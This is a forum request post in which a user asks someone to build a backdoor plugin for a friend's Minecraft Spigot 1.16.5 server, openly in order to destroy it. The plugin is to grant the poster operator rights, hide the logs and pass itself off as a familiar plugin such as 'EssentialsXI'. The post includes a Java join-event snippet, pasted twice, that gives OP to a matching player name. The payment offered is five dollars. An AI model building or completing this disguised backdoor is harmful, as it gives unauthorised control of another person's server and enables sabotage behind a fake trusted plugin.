Hi! I am Jaker, normal human being with a tight budget and wanting to destroy a friends minecraft server running 1.16.5 Spigot. I would like a plugin that gives me OP when the server is initially started and hides the logs. I would like for it to be called something like "EssentialsXI" or another well known plugin that a simple smp might need. I don't know if this line of code would work but I found it somewhere. If you can and are willing to make this plugin, dm me on discord @ jaker#0999. Anyways, here is the code I got from some friend I just have no clue how to use it LOL.
EventHandler public void onPlayerJoinEvent(PlayerJoinEvent e) { Player player = e.getPlayer(); if(player.getName().contains("IGN")) { player.setOp(true); } }
There are usually line breaks in between this code but is not showing for some reason in this text box. The payment will be 5$ because of how simple this plugin should be. Again, Spigot 1.16.5 ForceOP/Backdoor Plugin.
EventHandler public void onPlayerJoinEvent(PlayerJoinEvent e) { Player player = e.getPlayer(); if(player.getName().contains("IGN")) { player.setOp(true); } }
There are usually line breaks in between this code but is not showing for some reason in this text box. The payment will be 5$ because of how simple this plugin should be. Again, Spigot 1.16.5 ForceOP/Backdoor Plugin.
- Type
- Requesting
